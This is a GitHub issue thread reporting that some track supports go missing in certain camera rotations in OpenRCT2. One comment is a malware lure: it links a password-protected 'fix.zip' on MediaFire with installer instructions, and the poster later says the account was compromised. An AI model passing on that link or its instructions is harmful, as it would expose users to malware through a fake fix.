### ISSUE TITLE
Inconsistent support rendering

### ISSUE THREAD

**Issue by mrmbernardi** [OpenRCT2/OpenRCT2#22631]
### Operating System

Linux

### OpenRCT2 build

OpenRCT2, v0.4.13-168 (53cb740cab on develop, DEBUG)

### Base game

RollerCoaster Tycoon 2

### Describe the issue

Note the way the end two supports are missing on 2 of the rotations.

https://github.com/user-attachments/assets/f65d97a1-fe0e-4db9-bc86-53318b50ad02

### Steps to reproduce

This example in the video can be seen on the default RCT2 Six Flags Texas park between the go kart track and the elevator.

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
# **DO NOT DOWNLOAD ANYTHING I HAVE POSTED AS A COMMENT MY ACCOUNT WAS COMPROMISED AND BEING USED TO COMPROMISE OTHERS**

**I AM WORKING ON DELETING AND POSTING THIS ON ALL THREADS IN WHICH THEY USED MY ACCOUNT TO POST THIS**

**Comment by mrmbernardi** [comment]
Appears to be so. Close this if you want to use the old issue
